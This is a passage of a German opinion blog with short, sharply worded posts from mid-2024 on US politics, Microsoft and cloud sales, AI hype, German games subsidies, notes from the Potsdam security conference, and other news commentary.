[l] Nancy Pelosi findet, Biden sei zu alt.
Nancy Pelosi ist 84. Joe Biden ist 81.
Pelosi ist seit vielen Jahren zu alt und ignoriert einfach jede Kritik an ihrem Alter weg und bleibt weiter Abgeordnete.
Diese ganzen Gerontokraten in den USA sind echt bitter. Ich muss mal wieder an Breschnew, Andropow und Tschernenko denken. Was haben wir uns über die lustig gemacht damals im kalten Krieg, die ganzen schon Rigor Mortis zeigenden Halbmumien. Das war damals das klarste Zeichen für Machtmissbrauch und Autokratie. Bei uns im goldenen Westen undenkbar!
Update: Wo wir gerade bei Peinlichkeiten aus den USA sind: Bei ihren confirmation hearings klagen die Supreme Court Justices noch ganz anders.
“No man is above the law,” Neil Gorsuch told Sen. Patrick Leahy (D-VT) during his confirmation hearing in 2017. [...]
In Samuel Alito’s confirmation hearing he told the senate that “no president, Democratic or Republican, no president is above the law, as neither are you, nor I, nor anyone in this room.” [...]
Chief Justice John Roberts concurred, citing Youngstown as binding the president to the law.
Clarence Thomas ist schon so lange dabei, dass niemand auf die Idee kam, dass man das mal ansprechen sollte, bevor man ihn auf Lebenszeit beruft.
[l] Weil ich hier häufiger frage, wieso Leute Microsoft-Produkte kaufen, schickte mir ein Leser einen Erfahrungsbericht als Leserbrief:
Dein jüngster Artikel zu Microsoft, Win11 und verkackten Updates hat mich an die etwas außerweltliche Erfahrung erinnert, die ich vor einiger Zeit in einem Meeting mit Microsoft-Saldesdroiden gemacht habe, die ich Dir mal schildern wollte.
Zum Umfeld: Ich arbeite in einer mittelgroßen Bank in der IT-Security. Der Vorstand hat sich einen hippen CDO eingekauft, der hier mit Cloud und agil und so durchdigitalisieren soll. Azure findet er sehr geil, und so durfte ich neben seinen Lakaien vor einiger Zeit (Anfang des Jahres) an einem Meeting teilhaben, in dem MS mal darstellen sollte, was sie so alles Superes für uns tun könnten.
Das war…bizarr. Es handelte sich im Wesentlichen um eine Publikumsbeschimpfung. Die dreisteste Vorwärtsverteidigung, die ich je erlebt habe. Pointe: es funktioniert.
Seinerzeit war gerade wieder ein größerer Azure-Hack publik geworden. Der Leading Salesdroid, eine peinlich genaue Steve-Jobs-Kopie mit asketisch hagerer Statur, schwarzen Rollkragenpulli und trendigem Jackett ohne Kragen stieg gleich ein mit „JA, WIR WURDEN GEHACKT! Aber wenn sogar wir gehackt werden, dann haben SIE ja so gar keine Chancen, nicht gehackt zu werden! Deshalb: kommen Sie zu uns in die Azure-Cloud! Da beschützen die BESTEN DER BESTEN DER BESTEN Sie gleich mit! Das können Sie gar nicht selbst!“
Soso. Wie wäre es denn mal anstelle dessen mit der Bereitstellung von Software und Infrastruktur, die konsistent, durchschaubar und ordentlich gewartet ist?
Sein mitgebrachter Security-Bro hieb danach mit noch mehr Chuzpe und halb schreiend in die gleiche Kerbe: „Sie wurden noch nicht gehackt?!? DANN WISSEN SIE NUR NICHT, DASS SIE SCHON GEHACKT WURDEN!!!“
Haltlose Unterstellungen als Verkaufsargument. Holt mich gleich richtig ab.
Bevor er dann wichtig wichtig in den nächsten Flieger musste gab er dann natürlich auch zum Besten, dass nur MS in der Cloud in der Lage sei mit neuester KI unsere Infrastruktur zu schützen.
Das ließ mich alles echt sprachlos zurück. So eine kackdreiste Mischung aus Lügen, Schuldumkehr und Generierung von Verkaufschancen - das verdient fast schon Respekt.
Bonus: Die Zuständigen (ich war nur Gasthörer) fanden hinterher, das sei ein „super Termin“ gewesen.
Leider stimmt das in vielen Fällen sogar, dass die Leute völlig überfordert sind mit ihren Eigeninstallationen. Was nicht zuletzt daran liegt, wie kompliziert und beschissen dokumentiert aber gleichzeitig komplett die Untiefen versteckt hinter multiplen Abstraktionsschichten Microsoft-Software heutzutage ist.
Man lügt einfach dem Kunden ins Gesicht, er könne das einsetzen, ohne es zu beherrschen oder auch nur verstanden zu haben. Wenn was ist, kann er ja den Support anrufen.
Daher ist glaube ich die Metrik an der Stelle nicht, wo es unsicherer ist, sondern wo man für dasselbe inakzeptable Niveau an Inkompetenz und Unsicherheit mehr zur Ader gelassen wird. Und das ist ziemlich klar in der Cloud.
Es gibt da draußen noch vereinzelte gallische Dörfer, die den Anspruch haben, ihre IT-Landschaft selber beherrschen zu wollen, aber auch die sprenkeln da gerne Appliances drüber, die sie als Black Box betrachten und lieber nicht so genau hingucken.
Bei Star Trek gab es so einen Running Gag, wenn irgendein überlegener Gegner die Enterprise beschossen hat, dass sie dann die Schildfrequenzen moduliert haben. Microsoft fährt dieselbe Strategie. Die modulieren ihre Software immer schnell durch, und hoffen, dass der Angreifer keinen Exploit findet, der auch mit der Update nächste Woche noch funktioniert.
Das ist heutzutage der Goldstandard in Sachen Security. Je häufiger es Updates gibt, desto (weniger Kontrolle hat man) weniger schafft der Angreifer einen erfolgreichen Angriff. Wäre eigentlich eine prima Monty-Python-Nummer, wenn es nicht so tragisch wäre.

Mon Jul 1 2024

[l] Der US Supreme Court findet, dass Trump Immunität genießt für alles, was er "im Amt" gemacht hat. Weil das Amt noch nicht übergeben war, fallen darunter auch die ganzen Umsturzversuche.
Beim Team Biden gehen gerade bestimmt verstohlen Gedanken um, ob Biden nicht Trump kurz wegdrohnen könnte, um dann Immunität unter diesem Urteil zu haben.
Man fragt sich schon, so aus der Ferne, wie lange dieser Supreme Court noch machen darf, bevor er einem Umsturz zum Opfer fällt. Da geht es ja ganz offensichtlich schon lange nicht mehr um Rechtspflege.

Fri Jun 28 2024

[l] Es gibt News zu Wirecard!
Im Wirecard-Skandal meldete die Commerzbank Finanzermittlern und Aufsicht über ein Jahr vor dem Kollaps des Konzerns den konkreten Verdacht krimineller Machenschaften. Doch kam keine Rückmeldung der Ermittler, wie eine Betrugsspezialistin der Bank am Donnerstag als Zeugin im Münchner Wirecard-Prozess berichtete.
Ist eigentlich irgendjemandem ein Fall bekannt, bei dem die Bafin nicht auf ganzer Linie versagt und das glatte Gegenteil ihrer Mission gemacht hat?
Können wir diese Behörde bitte mal schließen, alle Leute feuern und auf eine schwarze Liste tun, und einen neuen Regulator bauen, garantiert ohne irgendeinen aus der alten Behörde?
Das Ausmaß des Versagens der Bafin erreicht inzwischen Ausmaße, dass Barden davon singen werden in der nächsten Zivilisation, nachdem unsere gescheitert ist.

Thu Jun 27 2024

[l] Neulich, in meinem "KI"-Vortrag, erklärte ich unter anderem, dass "KI", um in der IT-Security nützlich zu sein, Dinge prüfen können müsste, und dass "KI" nicht prüfen kann, was man ganz einfach daran sehen kann, dass OpenAI sonst ja einfach hinter ihre Halluzinationsmaschine noch eine Prüf-"KI" stellen könnte, die den Schmuh rausfiltert.
Können sie nicht, weil es nicht funktioniert. Und die sind ja nicht doof. Nur Schlangenölverkäufer, nicht doof.
Stellt sich raus: Doch, die sind so doof. Das wird natürlich genau so wenig funktionieren wie der Rest von deren Produkten. Und ihre Kunden werden so blöde sein, und einmal für die originäre "KI" zu zahlen, und dann nochmal doppelt für die "Korrektur"-"KI".
Achtet mal drauf: sie nennen es absichtlich nicht Korrektur sondern CriticGPT! Aus Korrektur könnte man ja ableiten, dass sie versprechen, dass die Korrekturen a) nur Fehler korrigieren und b) Fehler korrigieren. Beides wird natürlich nicht so sein.
Hey, vielleicht sind die doch nicht doof. Vielleicht haben die einfach nur gewartet, bis der Markt hinreichend verblödet ist, dass er für so ein "Produkt" reif ist.
Na dann… herzlichen Glückwunsch, lieber Markt. Gut gemacht.
Aber was rege ich mich auf. Ihr setzt ja auch Exchange ein, und Antiviren. Ihr mögt auch BSI-Checklisten. Ihr habt euch auch schon bei Blockchain und IoT verarschen lassen, und aktuell schwappt gerade eine riesigen Quanten-Verarsche-Welle über das Land.
Na macht ihr mal ruhig alle. Ist ja nicht mein Geld, das ihr da verbrennt.
Oh warte. Doch. IST mein Geld, das ihr da verbrennt. Fucking Hell!
[l] Der Bundesrechnungshof ist unzufrieden mit der Spieleförderung.
Ich ehrlich gesagt auch. Und ich sage das als jemand, der häufig und gerne zockt.
Der Bundesrechnungshof findet, für sowas seien die Länder zuständig, nicht der Bund, und im Übrigen sollten die Spielefirmen das zurückzahlen, zumindest wenn sie erfolgreich arbeiten.
Ob nun der Bund oder die Länder zuständig sind, finde ich persönlich nebensächlich. Die Zurückzahlung nur im Erfolgsfall lädt meiner Ansicht nach zum Betrug ein. Große Firmen haben ja jetzt auch schon keine Probleme damit, ihre Profite für die Steuer kleinzurechnen.
Aber was mich noch viel mehr ärgert ist die Argumentation der Branche. Deren Argumentation wirkt auf mich geradezu grotesk.
Der Prüfbericht lasse entscheidende Faktoren außer Acht und verkenne das Ziel der Games-Förderung.
Das Ziel der Games-Förderung? Ja, äh, was IST denn das Ziel der Gamesförderung?! Eine Branche aus Mitnehmern und Subventionsabzockern heranzüchten, die Steuergelder für am Markt nicht erfolgreiche Produkte verbrennen, ohne staatliche Handouts nicht arbeitsfähig wären, und dann auch noch praktisch vollständig am Markt scheitern?
"Aufgrund des einseitigen Fokus auf befürchtete Gefahren durch Games in den 1990er und frühen 2000er Jahren hat Deutschland die Potenziale von Games nahezu vollständig verschlafen", schreibt game-Geschäftsführer Felix Falk.
Wegen Geschwafel von irgendwelchen ewiggestrigen Geronto-Politikern der CDU hat Deutschland Spiele verschlafen? Alter, da haben ja eure schrottigen Games einen besseren Plot! Deutsche Firmen hätten einfach Spiele entwickeln können, die am Markt erfolgreich sind. Haben sie aber nicht. Ich vermute: Ist nicht so einfach, wenn man die Kosten selber tragen muss.
Ich persönlich finde es nicht wichtig, dass Spiele aus Deutschland kommen. Im Gegenteil. Wichtiger fände ich, dass Spiele nur für den PC gemacht werden, und zwar am besten nicht für Windows sondern für Linux. In allen anderen Fällen verdient nämlich vor allem einer: Der Plattformbetreiber. Xbox, Nintendo, Apple, Playstation, KEINER von denen hat auch nur einen müden Cent aus unserem Steuersäckel verdient. Das finde ich eine bodenlose Frechheit, dass unser Staat Firmen Geld in den Arsch bläst, die dann damit ausbeuterische Tech-Bro-"Ökosysteme" finanzieren.
Linux-Spiele spielen am Markt so gut wie keine Rolle. Also braucht es auch keine Förderung, finde ich.
Die Anzahl der Arbeitsplätze in der Spielebranche sind im Vergleich nicht mal ein Rundungsfehler. Die Arbeitsbedingungen sind legendär schlecht und weltweit segeln Studios der Reihe nach immer knapp vor der Insolvenz herum und werden dann von Makrophagen wie EA aufgekauft und eingestampft.
Kohle machen vor allem zwei Arten von Spielen: Spiele, die aktiv Suchtspiralen bei Minderjährigen auslösen und bedienen, und riesige Fußball-Franchise-Kackscheiße.
Ich halte es für unverantwortlich, solche Geschäftsmodelle überhaupt überleben zu lassen, geschweige denn auch noch staatliche Gelder draufzuwerfen.
Wir reden hier übrigens von 100 Mio Euro. Wisst ihr, wie viele Schulen man damit schimmelfrei kriegen könnte? Bei wievielen Schulen man das Dach reparieren könnte, damit es nicht mehr reinregnet? Aber hey, das reinregnen und das fehlende Klopapier stören die Kids nicht so, wenn wir ihnen süchtig machende Abzockspiele geben!1!!
In was für einer Dystopie leben wir hier eigentlich!?
Größter Subventionsabgreifer Stand Mitte letzten Jahres war übrigens die Embracer Group. Die danach pleite gegangen ist und diverse Studios mit in den Untergang gerissen haben, die sie vorher mit Börsenzockergeld gekauft haben, das sie dann nicht zurückzahlen konnten. SOLCHE LEUTE greifen dieses Geld ab. Platz zwei auf der Liste ist Kalypso, die seit Jahren nur noch Sequels für etablierte Franchises "entwickeln". Ja geil ey.
Platz 3 ist Egosoft, deren Spiele ich immer gerne gespielt habe, aber die sich auf dem Weg irgendwo offensichtlich massiv verhoben haben. Für mich als deren Kunde wirkt es, als seien die überhaupt nur noch am Markt, weil sie Millionenförderung kassieren und nie zurückzahlen müssen. Die versuchen nicht mal, einen breiten Markt zu bedienen, sondern das ist eine winzige Sparte an Weltraumsimulationen, die so klein ist, dass du dein Spiel im wesentlichen einmal an jeden Insassen verkaufen musst, um die Kohle wieder einzuspielen. Finde ich nicht nachvollziehbar, wieso der Staat da Geld reinschießen sollte, wenn nebenan die Grundschule weder dichte Fenster noch Klopapier hat.
Weiter unten gibt es dann noch Stillfront, von denen ich noch nie auch nur gehört habe, und Ubisoft und Bandai Namco. Wenn jemand KEINE Förderung kriegen sollte, dann solche langetablierten Megakonzerne.
Sorry, aber da bin ich Wirtschaftsliberaler. Wenn du keine Spiele entwickeln kannst, die dann am Markt Bestand haben, dann solltest du keine Spiele entwickeln. Ganz bestimmt nicht soll der Staat dein gescheitertes Geschäftsmodell mit Subventionen am Leben halten.
"Das hat zu Nachteilen im internationalen Wettbewerb gesorgt, die sich bis heute negativ auswirken. Diesen Rückstand können wir nur mit einer international konkurrenzfähigen Games-Förderung aufholen."
BULLSHIT. Boah da krieg ich ja Puls ey. Ihr weinerlichen Versager! Parasiten an der Zitze der staatlichen Geldverschenker!
Die Auffassung des Bundesrechnungshofes verkenne die "weltweite Marktrealität".
Oh, die weltweiter Marktrealität, ja? Lass mich euch kurz die weltweite Marktrealität zeigen:
Pile of Shame auf Steam hat 19 Milliarden US-Dollar gekostet
Der Pile of Shame sind Spiele, die verzweifelte Leute gekauft haben, und dann nie angespielt haben, weil die Spiele selbst kostenlos (weil bereits gekauft) nicht attraktiv genug waren, sie auch nur einmal kurz anzuspielen. SO VIEL GELD liegt da auf der Straße! Man muss nicht mal ein gutes Spiel machen, um das abzugreifen. Es reicht, wenn du ein mittelmäßiges Spiel machst. Die Leute sind so verzweifelt auf der Suche nach nicht total beschissenen Spielen, die kaufen jeweils Dutzende von Spielen, die sie dann nie spielen!
Weltweite Marktrealitäten, mein Arsch!
Update: Mel Brooks hat übrigens mal einen Film zu dem Thema gemacht, dass Produzenten absichtlich einen Flop produzieren, um die Förderkohle einfach selbst einstecken zu können. Heißt The Producers und ist ein Klassiker, besonders Springtime for Hitler. Es gab auch ein Remake, das auch gut geworden ist.
[l] Der US Supreme Court löscht ein Korruptionsgesetz, das es strafbar gemacht hat, wenn ein Offizieller von jemandem Geschenke über $5000 entgegen nimmt, nachdem er demjenigen Geschäfte zugeschustert hat.
Das sei ja nur Korruption, finden die großzügig beschenkten Richter, wenn man vorher bezahlt wird.
Die beste Demokratie, die man für Geld kaufen kann!
[l] Endlich tut mal jemand was gegen die ganzen kriminellen Ausländer!1!!
Schon ein einzelner Kommentar oder Like soll reichen: Wer terroristische Taten im Netz billigt, soll leichter aus Deutschland ausgewiesen werden können. Das Kabinett beschließt einen Vorschlag von Innenministerin Nancy Faeser.
Ja gut, äh, also das ist strikt genommen kein Verbrechen und damit keine Kriminalität. Und außerdem liegt das im Auge des Betrachters, ob ein Kommentar positiv gemeint ist oder vielleicht Satire war.
Lass es mich anders formulieren.
Endlich tut mal jemand was gegen diese Ausländer!!1!
Es gibt so einen alten Spruch: Nur Nixon konnte nach China gehen. Der war der Kandidat der "unmöglich kann man mit China reden"-Partei. Seine Partei hätte die anderen in der Luft zerrissen, wenn die das gemacht hätten. Konnte nur er.
Nur die SPD und die Grünen konnten den ersten Angriffskrieg in der Geschichte der Bundesregierung führen. Nur die SPD konnte den Sozialstaat abschaffen.
Und jetzt halt: Nur die Sozen und die Grünen konnten ordentlich Ausländerfeindlichkeit zur Staatsdoktrin machen.
Tolles Land haben wir hier! Mit voll so Humanismus und Menschenrechten und so.

Thu Jun 20 2024

[l] Einem Leser ist aufgefallen, dass Die Cyberagentur (*fremdschäm*) schon 2022 eine Ausschreibung zu mobilen Quantenprozessoren gemacht hat. m(
[l] Ich habe mir auf der Potsdamer Sicherheitskonferenz noch ein paar Notizen gemacht, wenn Äußerungen fielen, die ich bemerkenswert fand.
Hier sind ein paar davon.
BSI-Chefin Plattner meinte: Ich liebe Checklisten, aber Checklisten werden uns nicht retten. Da freut mich immerhin der hintere Teil von. Ihre Lösung war dann leider, man müsse da eben mehr Dinge automatisieren.
Das finden viele Softwarehersteller auch und automatisieren seit Jahren immer mehr Prozesse. Ergebnis: Der Druck auf dem Opfer, dem Kunden, wächst immer mehr, weil immer mehr Patches rauskommen.
Ich finde, man sollte Patches hier nicht so positiv sehen. Jeder Patch ist ein Nachweis dafür, dass der Hersteller versagt und unsichere oder anderweitig kaputte Software verkauft hat. Ich finde es gut, dass die Hersteller überhaupt Patches machen. Aber erinnern wir uns: Das war nicht die Arbeit des BSI, die das herbeigeführt hat, sondern dass Hacker lauter Exploits verbreitet haben, so dass man das nicht mehr unter den Teppich kehren konnte.
Leider ist über die Jahre ein bisschen unter den Tisch gefallen, dass wir heute nicht wirklich sicherer sind als früher, weil immer noch jede Software die ganze Zeit unsicher ist. Es gibt einen unaufhörlichen Nachschub an Bugs, wir kennen sie nur noch nicht.
Da wo wir wirklich Fortschritt gebraucht hätten, nämlich dass die Software weniger Patches braucht, haben wir das Gegenteil davon gekriegt. Frau Plattner meinte dann auch noch, moderne Software ließe sich besser schützen als alte. Das ist leider auch genau die Linie der Softwarehersteller, die Security nicht als Pflicht sondern als Vertriebsvehikel sehen. Was setzt du denn auch den alten Windows Server ein, kauf doch lieber einen neuen Windows Server!1!!
Plattner hat sich dann auch als "KI"-Fan geoutet, was mich ein bisschen zusammenzucken ließ. Sie sagte dann, was auf dieser Veranstaltung noch mehrere andere sagten: KI hilft Angreifern, wir müssen zur Verteidigung daher genau so schnell auf KI setzen.
Dafür kurz als inhaltliche Klarstellung: Nein. KI hilft Angreifern nicht. KI erzeugt keine Exploits, identifiziert keine Bugs, analysiert keine Patches. In einigen Proof of Concept Fällen kann man möglicherweise eine Demo faken, aber KI hilft Angreifern nicht.
KI kann dafür sorgen, so erklärten dann einige Teilnehmer, dass die Scam-Mails weniger Rechtschreibfehler haben. Die haben nicht verstanden, dass die Rechtschreibfehler absichtlich drin sind. Die Scammer richten sich ja nicht an Leute, die Scams erkennen, und dann möglicherweise Ärger machen und ihr Geld zurück haben wollen oder die Polizei rufen, wenn die noch was machen kann. Die richten sich an naive alte Menschen und filtern mit den Rechtschreibfehlern die anderen raus.
OK, nächste Aussage, die ich lustig fand: Da saß ein Typ von Rohde und Schwarz auf der Bühne in dem einen Podium mit der Plattner, der mehrfach negativ auffiel, indem er sie demonstrativ duzte. Ich würde ja schon grundsätzlich gegen die Anwesenheit von R&S opponieren, aber das fand ich echt auffallend respektlos und eine Frechheit. Jedenfalls, wieso ich den erwähne: Der erzählte (als Anekdote, dass in Deutschland Innovation ja wegen Überregulierung ausgebremst würde), sie hätten ja "KI" einführen wollen, seien aber am Personalrat gescheitert. Wieso ich R&S nicht mag ist weil sie IMSI-Catcher für den Unterdrückungsstaat bauen, und Militär und Geheimdienste mit Spezialequipment beliefern. Aus meinen Augen ist das unethisches Geschäftemachen.
Was haben wir noch ... da saß noch ein Telekom-Mensch, deren Cloud Security-Chef glaube ich, der sich (für Nerds humoristisch) verplapperte, dass man ja im Moment auch Mails von Servern mit abgelaufenen TLS-Zertifikaten annehmen müsse, weil der Zustand der Security-Landschaft da draußen so schlimm sei. Bei SMTP mit TLS präsentiert nur der annehmende Server ein Zertifikat. Der Einsender zeigt gar keines, das abgelaufen sein könnte. Den Versprecher fand ich lustig genug zum notieren :-)
Neben dem Telekom-Typ saß ein Cisco-Schlipsträger auf dem Podium, der dann erzählte, wenn sich Kleinunternehmer keine IT-Abteilung leisten können, dann müssen sie halt managed Services einkaufen von jemandem. Die Telekom daneben nickte. Da hab ich mich ziemlich geärgert, weil sich hier die Täter (die Telekom hat Millionen von schrottigen Plasteroutern im Feld und Cisco hat mehr Hintertüren in ihren Produkten gehabt als alle Konkurrenten zusammen und war gerade an dem Webex-Debakel Schuld) auf der Bühne erzählen dürfen, die Kosten solle mal ihr Kunde/Opfer tragen. Da hätte ich mir gewünscht, dass der Moderator mit dem großen Holzhammer draufkloppt.
Die Keynote von dem BKA-Chef war spannend, weil das mein erstes Mal war, dass ich die BKA-Panikslides sehe, mit denen sie die Politik immer wieder dazu kriegen, ihnen mehr Befugnisse zu geben. Kommunikationstechnisch waren die Slides brillant gemacht. Auf ihnen standen lauter PANIK-PANIK-Zahlen und Grafiken drauf, Milliardenschäden, alles furchtbar, wir sind so gut wie tot, die Kriminellen sind super ausgebildet und besser organisiert als wir und so weiter, aber der Vortrag war das glatte Gegenteil. Der Mann ist ein Karriere-Polizist, ein lockerer Typ mit nach Hamburg klingender Sprache, der da weitgehend ruhig und cool vorträgt, dass das ja alles schlimm aussähe, aber man sei am Ball, die Quote der Lösegeld bezahlenden Ransomwarebefälle sei rückläufig, und man habe ja schon folgende Domains beschlagnahmt und jeweils MILLIONEN von Euros in Bitcoin vom Markt genommen.
Die Folien sagten PANIK PANIK PANIK aber die Worte sagten: Alles im Griff. Wir werden hier nicht von technischen Dingen ausgebremst sondern von den Befugnissen. Wenn ihr nur kurz das Grundgesetz ändert (trug er wirklich so vor!), dann können wir die auch verhaften, bevor sie auch ransomwaren. Vorschlag dazu liegt auf dem Tisch, muss nur noch vom Parlament abgestimmt werden. Alles in Ordnung. Wir handlen das.
Das ist kein leichter Spagat! Auf der einen Seite OH MEIN GOTT IHR MÜSST JETZT SOFORT HANDELN kommunizieren aber gleichzeitig "bei uns ist das in guten Händen, wir haben alles im Griff" zu sagen und noch für eine Grundgesetzänderung für Gefahrenabwehr zu werben, ohne dass das wie Erpressung aussieht (ihr müsst das jetzt machen sonst sind wir alle tot).
Ich muss sagen: Hut ab vor dem BKA-Chef. Der weiß, was er tut, und wie er es tun muss. Der sammelt seit Jahren erfolgreich immer mehr Befugnisse ein, ohne dafür dann irgendwas vorzuzeigen zu haben.
Der nächste Vortrag war dann von ZITIS, hatte ich ja schon erzählt, mit den mobilen Quantencomputern. Der hatte noch ein paar andere haarsträubende Projekte, von denen er erzählte. Er wollte Quantenoptik haben (seine Begrifflichkeit!), damit man vor dem Tür eintreten durch die Wände gucken kann. Das ist meines Wissens nichts, was die Physik-Disziplin der Quantenoptik überhaupt auch nur versucht, geschweige denn als Ziel formuliert, aber da lasse ich mich gerne korrigieren. Desweiteren fand er "KI" transformativ und wir müssen schnell aufspringen, und im Übrigen werden Drohnen immer billiger und wichtiger, das brauchen wir auch, und dann warnte er noch vor kriminellen LLMs, die mit Darknet-Daten trainiert seien, und dann nicht wie bei den guten Menschen von OpenAI einen Filter drin haben, der sich weigert, Bombenbauanleitungen auszuhändigen. ZITIS lässt außerdem an neuronalen Netzen zur Erkennung von Hass im Internet forschen, und hat ein Projekt für die "Robustheit von KI" gestartet (kann ich jetzt schon sagen, dass das scheitern wird), und sie machen sich Sorgen vor der Manipulierbarkeit von "KI". Stöhn.
Den Schenkelklopfer des Tages brachte aber der CISO der Bundeswehr, schön in Ausgehuniform, der sich auch zu Ransomware äußerte (offenbar sehen sich da auch Bundeswehr-Behörden von angegriffen): Davon geht keiner aus, bei uns Lösegeld erpressen zu können. Das Publikum wieherte vor Lachen :-)
Update: Wenn ich hier gefühlt alles kritisiere, was Frau Plattner vorgetragen hat, wieso sah ich ihre Person trotzdem positiv am Ende? Ich hatte den Eindruck, dass die halt noch nicht alle Fakten gehört hat, und möglicherweise umgestimmt werden kann, wenn ihr mal jemand die andere Hälfte der Realität zeigt, und andere Blickwinkel. Den BKA-Chef, der Bundeswehr-CISO, den ZITIS-Typen, die wirst du alle nicht umgestimmt kriegen, egal was du vorträgst. Die machen da halt ihren Job und werden sich nicht von Fakten behindern lassen.
Update: Übrigens, am Rande: Der ZITIS-Chef war vorher Abteilungsleiter für technische Aufklärung beim Bundesnachrichtendienst.
Karl war viermal als Zeuge in den NSA-Untersuchungsausschuss des Deutschen Bundestags geladen. Als Unterabteilungsleiter im Bundesnachrichtendienst war er zuständig für die Übermittlung deutscher Internetdaten an die National Security Agency in der Operation Eikonal und deutscher Telefondaten an die Central Intelligence Agency in der Operation Glotaic.
Ja klar! Was machst du mit so jemandem? Rausschmeißen geht ja nicht, denn dann müsste man ja auch lauter andere Leute rausschmeißen. Bleibt ja quasi nur befördern! Mobile Quantencomputer, ich leg mich flach.

Thu Jun 13 2024

[l] Wie haben die Mastodon-Entwickler es eigentlich geschafft, dass ihre schrottige Gammel-Webanwendung NOCH ineffizienter als Twitter und Facebook zusammen ist?
Aus dem Bahn-Netz lädt ein einzelner Toot regelmäßig 5 Minuten und mehr. Das ist echt nicht zu fassen, was das für eine Zumutung ist. Das ist als habe da jemand eine Wette gemacht. Komm, Atze, ich kann das NOCH ineffizienter machen!!1!

Mon Jun 10 2024

[l] Volt hat übrigens ihre Stimmen seit dem letzten Mal ca verdreifachen können. Spricht keiner drüber, weil die Ausschläge bei den anderen Parteien noch krasser waren.
Übrigens, am Rande: Wenn man sich bei der Tagesschau durch die Demografie zur Wahl klickt, fällt auf, dass die Über-70-Jährigen als praktisch einzige Altersgruppe unterdurchschnittlich viel AfD gewählt haben. Die haben alle stramm CDU gewählt.
Ich habe auch Volt gewählt dieses Mal, obwohl es da einige Kröten zu schlucken gab — nicht zuletzt dass deren Gründer vorher bei McKinsey war und dass sie für 2% Rüstungsausgaben sind. Sie sind aber unsere einzige Chance auf Klimarettung, glaube ich, weil die einzelnen Länder nicht in der Lage sind, in ihrem eigenen Haus die Dinge zu tun, die getan werden müssten. Deutschland wird niemals die Autombilindustrie gefährden, selbst wenn die Alternative der Freitod der ganzen Spezies ist. Ich denke mir, dass das in den anderen Ländern auch so sein wird. Jeder findet, die anderen sollten anfangen, und machen dann Kosmetik oder Taschenspielertricks wie Carbon Offset oder Emissionszertifikatshandel. Oder setzen "technologieoffen" auf offensichtlich am Markt keine Chance habende Technologien wie Wasserstoffautos, nur damit sie sagen können, sie hätten ja etwas getan.
Daher muss die Rettung von oben kommen, und da bleibt dann ja nur das Europaparlament. Volts Klimaziele waren unter den Parteien führend, also habe ich Volt gewählt.
Sonst wären Mera25 mein Favorit gewesen, aber deren Gaza-Verhalten hat mir nicht gefallen. Laut Wahl-O-Mat hätte es die PARTEI werden müssen, aber da hat Nico Semsrott hingeschmissen, der für mich der perfekte Abgeordnete war. Er wollte das Geld nicht, wollte gegen die Unrechtigkeit im Parlament vorgehen, hat dann Werbekosten transparent gemacht und für gemeinnützige Projekte umzuleiten versucht, und ging am Ende, weil er nicht Teil von dem Scheißsystem sein wollte. Der wäre mir der liebste Abgeordnete überhaupt gewesen. Von so jemandem möchte ich im Parlament vertreten werden. Seine Nachfolgerin wird wohl Sibylle Berg, die für mich weit weniger klar geeignet ist als es Nico gewesen wäre. Da erschien mir bei Volt das Risiko unterm Strich geringer.

Fri Jun 7 2024

[l] Microsoft Will Switch Off Recall by Default After Security Backlash.
Ich würde da nicht viel drauf geben. Nur weil Microsoft erkannt hat, dass etwas ein massiver Rohrkrepierer ist, heißt das nicht, dass sie das nicht jahrelang mit unlauteren Methoden trotzdem in den Markt zu drücken versuchen werden.
Bing gibt es ja auch noch. Und Edge. Und Office nervt auch mit irgendwelchen Cloud- und "KI"-Funktionen, nach denen keiner gefragt hat, und die keiner haben wollte. Und die man nicht global ausschalten kann, weil Microsoft genau weiß, dass die Leute das sonst alle tun würden.
Oh und: Habt ihr alle schon einen Microsoft-Account gemacht? Damit ihr Windows installieren konntet?

Thu Jun 6 2024

[l] Die Russen spüren gerade, wie sich digitale Unsouveränität anfühlt.
Apple declined to issue a bug bounty to the Russian cybersecurity company Kaspersky Lab after it disclosed four zero-day vulnerabilities in iPhone software that were allegedly used to spy on Kaspersky employees as well as Russian diplomats.
Ach. Ach was. Erst die Russen über Backdoors ausspionieren, dann nicht zu seinem Bug-Bounty-Wort stehen? Na das ist aber nicht die feine amerikanische Art!
Due to the sophistication of how the vulnerabilities were exploited and the limited targeting of the attackers — seeking intelligence material rather than financial details — it was suspected to be state-sponsored.
Ich würde da von mehr als "suspected" sprechen.
On the same day as Kaspersky’s disclosure, Russia's Federal Security Service (FSB) accused the United States and Apple of having collaborated to enable the U.S. to spy on Russian diplomats.
Diesem Anfangsverdacht würde ich an deren Stelle auch hegen.
Die haben echt gar keine Scham, die Amerikaner. Hey, ein Glück, dass Europa sich nicht vollständig von amerikanischen Firmen abhängig gemacht hat!1!!
(In Hintergrund sieht man ein paar Dutzend Cloud-Migrationen vorbeiziehen)

Thu May 30 2024

[l] Falls ihr euch gedacht habt: Hey, die SPD ist doch viel zu blöde, um sich diesen Cum-Ex-Scheiß auszudenken! Da braucht es echte Wirtschaftskompetenz für! Das muss die CDU gewesen sein!
Dann liegt ihr natürlich völlig richtig.
Außerdem sollen seine Vorgänger Ole von Beust und Christoph Ahlhaus sowie der ehemalige Finanzsenator Wolfgang Peiner und der frühere Ministerpräsident von Schleswig-Holstein, Peter Harry Carstensen - allesamt von der CDU - aussagen. Sie waren in der Zeit politisch verantwortlich, in der die HSH Nordbank Cum-Ex-Geschäfte getätigt hat.
Ach. Ach was. Na sowas!
Was sagt denn die CDU dazu?
Das sieht die CDU ganz anders. Es gehe nicht darum, ob die HSH Nordbank von 2008 bis 2011 Cum-Ex-Geschäfte gemacht habe, so die Christdemokratin Anke Frieling, sondern darum, wie nach dem Bekanntwerden 2013 der damalige SPD-Senat damit umgegangen sei.
Ich habe einen Kompromissvorschlag! Gefängnisstrafen für CDU und SPD!

Mon May 27 2024

[l] Na die 60 Millionen, die Google für den Kauf der Reddit-Forendaten gezahlt haben, haben sich ja mal so richtig gelohnt. Bonus: Der Link geht auch noch zu Reddit. Full Circle!
(Liebe Kinder, gebt fein acht: Nein, in eurem Penis wohnen keine ~~Asseln~~ Schaben. Da hat jemand auf Reddit einen Witz gemacht und die Google-"KI" hat es geglaubt.)

Sun May 26 2024

[l] Die Briten hatten einen Skandal um kontaminierte Blutkonserven, und die Aufarbeitung wurde gerade abgeschlossen. Die Blutkonserven waren mit HIV oder Hepatitis C infiziert und es sind mindestens 3000 Menschen daran gestorben, bei mindestens 30000 Infektionen.
Das lief von den frühen 1970er Jahren bis Anfang der 1990er Jahre, spannte also mehrere Regierungen, und alle haben es geschehen lassen.
